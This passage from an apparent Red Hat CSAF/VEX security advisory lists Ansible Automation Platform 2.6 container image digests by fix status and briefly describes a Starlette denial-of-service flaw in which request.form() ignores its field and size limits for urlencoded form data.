"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2491440"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Starlette where the request.form() method silently ignores configured resource limits (max_fields and max_part_size) when parsing application/x-www-form-urlencoded data. An unauthenticated attacker can exploit this by sending a urlencoded request body with an arbitrarily large number of fields or an oversized field, causing denial of service through resource exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "starlette: Starlette: request.form() limits silently ignored for application/x-www-form-urlencoded enable DoS",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in Starlette where the request.form() method silently ignores configured resource limits (max_fields and max_part_size) when parsing application/x-www-form-urlencoded data. An unauthenticated attacker can exploit this by sending a urlencoded request body with an arbitrarily large number of fields or an oversized field, causing denial of service through resource exhaustion. This only affects applications that explicitly call request.form() on urlencoded input; JSON-only APIs and services where Starlette is a transitive dependency not used for form parsing are not affected.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
